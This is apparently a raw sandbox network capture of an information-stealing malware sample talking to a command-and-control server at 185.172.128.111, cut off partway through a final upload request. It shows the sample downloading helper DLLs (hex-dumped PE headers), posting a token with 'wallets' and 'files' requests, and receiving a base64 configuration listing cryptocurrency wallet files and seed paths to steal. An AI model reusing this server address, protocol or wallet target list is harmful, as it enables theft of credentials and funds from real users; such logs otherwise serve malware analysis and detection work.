2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Apr 23, 2024 09:27:05.991219997 CEST	91	OUT	GET /8e6d9db21fb63946/nss3.dll HTTP/1.1 Host: 185.172.128.111 Cache-Control: no-cache
Apr 23, 2024 09:27:06.303133965 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:06 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 23, 2024 09:27:08.930541992 CEST	95	OUT	GET /8e6d9db21fb63946/softokn3.dll HTTP/1.1 Host: 185.172.128.111 Cache-Control: no-cache
Apr 23, 2024 09:27:09.239054918 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:09 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Apr 23, 2024 09:27:11.177432060 CEST	99	OUT	GET /8e6d9db21fb63946/vcruntime140.dll HTTP/1.1 Host: 185.172.128.111 Cache-Control: no-cache
Apr 23, 2024 09:27:11.485615015 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:11 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Apr 23, 2024 09:27:12.619091988 CEST	203	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJ Host: 185.172.128.111 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 23, 2024 09:27:13.136277914 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 23, 2024 09:27:13.312385082 CEST	469	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC Host: 185.172.128.111 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 43 2d 2d 0d 0a Data Ascii: ------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="token"958c6e1ca5de899071f18a6ac4dc33c92762fb2765d862dda440aa63685631b0723d92e0------HJKECAAAFHJECAAAEBFCContent-Disposition: form-data; name="message"wallets------HJKECAAAFHJECAAAEBFC--
Apr 23, 2024 09:27:13.624871016 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 07:27:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
Apr 23, 2024 09:27:13.626974106 CEST	467	OUT	POST /f993692117a3fda2.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJ Host: 185.172.128.111 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 38 63 36 65 31 63 61 35 64 65 38 39 39 30 37 31 66 31 38 61 36 61 63 34 64 63 33 33 63 39 32 37 36 32 66 62 32 37 36 35 64 38 36 32 64 64 61 34 34 30 61 61 36 33 36 38 35 36 33 31 62 30 37 32 33 64 39 32 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 2d 2d 0d 0a Data Ascii: 